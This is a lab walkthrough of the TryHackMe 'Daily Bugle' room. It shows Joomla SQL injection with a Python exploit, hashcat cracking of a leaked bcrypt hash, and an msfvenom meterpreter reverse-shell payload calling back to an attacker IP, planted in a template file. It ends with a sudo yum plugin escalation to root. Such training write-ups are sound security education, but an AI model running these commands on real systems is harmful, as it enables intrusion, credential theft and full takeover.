- Link: https://tryhackme.com/room/dailybugle
- Difficulty: hard
- Highlight: leveraging sudo privileges on yum to gain persistent root access
- Tools used:
- Tags: joomla, sqli, yum
This box is another black-box-style challenge with a few extra guiding questions.
We learn that the “Daily Bugle” reports front-page news about Spiderman robbing a bank. It’s our job to hack into the system to recover the user + root flags.
yum also point us in the direction of the
joomla service, SQL injection, and leveraging user permissions on the yum binary to gain root access.
sudo nmap -A -oN nmap-results.txt <$targetIP> -O
And we’ll follow that up with an
nmap script scan for more information about potential vulnerabilities:
nmap --script vuln -O -oN nmap-vuln.txt 10.10.239.203
Here is a snippet of interesting
A snippet of interesting
dirb scan results:
Notable findings include the hidden web directory (
/administrator) that has a login portal. We’ll keep this in mind for later on in the hack.
Cross-referencing the vulnerability discovered by our
nmap vuln script scan in
exploit-db, we find a downloadable text exploit file with instructions to use
I attempted to execute this exploit via Metasploit console but had no luck.
Plan B is to use
sqlmap with the command given in the text file from
Our first attempt at using
sqlmap errors out, so we lower the risk variable and try again.
Our new command with
risk=2 completes the job, but doesn’t turn up anything interesting.
Let’s search around for a different method to exploit this vulnerability.
We searched for Joomla 3.7.0 exploit and found a Python script. Let’s go ahead and use the following command to start the exploit:
python3 sqli.py http://<$targetIP>/index.php?component/users/?view=login?
Success! We extracted a username and a hashed password.
Extracting users from fb9j5_users [$] Found user ['811', 'Super User', 'jonah', 'email@example.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
CRACK THAT HASH WITH HASHCAT
Let’s fire up
hashcat and start the cracking!
A quick google search for a hash identifier website helps us determine that the hashing method used is the bcrypt/Blowfish algorithm. I looked up the id number for this hash in the help for
hashcat and found it was
I omitted this step from the video to save time and keep people watching.
Hashcat took 51 mins, 18 secs to crack the hash using
rockyou.txt for the wordlist. I also attempted to use John the Ripper to crack this hash, which was much slower than
hashcat on my machine.
After saving the hash string in a file “hash”, we can start let hashcat do the work from here.
hashcat -m 3200 --show hash
Session..........: hashcat Status...........: Cracked Hash.Name........: bcrypt $2*$, Blowfish (Unix) Hash.Target......: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p...BtZutm Time.Started.....: Mon Jan 30 12:15:23 2023 (51 mins, 18 secs) Time.Estimated...: Mon Jan 30 13:06:41 2023 (0 secs) Guess.Base.......: File (/home/kalisurfer/hacking-tools/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 15 H/s (17.05ms) @ Accel:8 Loops:8 Thr:1 Vec:16 Recovered........: 1/1 (100.00%) Digests Progress.........: 46848/14344384 (0.33%) Rejected.........: 0/46848 (0.00%) Restore.Point....: 46816/14344384 (0.33%) Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:1016-1024 Candidates.#1....: sword -> smile4ever Started: Mon Jan 30 12:15:18 2023 Stopped: Mon Jan 30 13:06:42 2023
The cracked hash was saved as a new file in the current directory. Now that we have our username and password we can go ahead and log in to that administrator portal we discovered earlier.
Now that we are in the system as an administrator, we can modify the pages to add a revshell script. We’ll use the template for
error.php and change the payload to a reverse meterpreter shell.
CREATE A METERPRETER PAYLOAD
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.6.2.23 LPORT=2222 -f raw > rev.php
UPLOAD THE FILE IN TEMPLATES/ERROR.PHP
We’ll use the common text editor VIM to copy everything in the
payload.php file to our clipboard using the quick and easy command:
%– apply the next command to all lines
+– copy to clipboard
:q! to quit without saving.
CATCH A REVERSE METERPRETER SHELL
We’ll set up the meterpreter listener using the exploit (multi/handler) options, being careful to set the payload to the same payload that we used when running
msfvenom to create the malicious payload (payload = php/
After catching the meterpreter shell, we’ll proceed to upload
linpeas and run it from the regular shell within Metasploit console. The password for
jjameson was discovered in plaintext.
LOGIN AS jjameson VIA SSH
Now that we presumably have a password login combo with
jjameson, let’s try connecting via ssh. It works, and we are in as
jjameson. Let’s grab the user flag and then continue on to
cat user.txt 27—---omitted—------2e
Let’s check sudo permissions with
Checking GTFObins for yum, we find a pathway toward root privileges. All we have to do is cut and paste the following lines from GTFObins.
cat >$TF/y.py<<EOF import os import yum from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE requires_api_version='2.1' def init_hook(conduit): os.execl('/bin/sh','/bin/sh')
sudo yum -c $TF/x --enableplugin=y
Now we can recover the root flag in the usual spot:
Although this box has a difficulty rating of hard, I didn’t find it to be much more complex than some of the easy-rated boxes on TryHackMe. It did take a few extra hours to complete, so maybe length is a factor that they consider when determining difficulty ratings.
PERSONAL HACKING GOALS
My immediate goal is to get into the top 1% of hackers ranked on the platform. I’m currently in the top 2% and still need to surpass roughly 10,000 hackers before I can join the ranks in the top 1%.
Jumping from a new hacker to the top 3% seemed to happen very quickly. The jump to the top 2% took considerable effort, and the next jump seems exponentially more difficult.
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.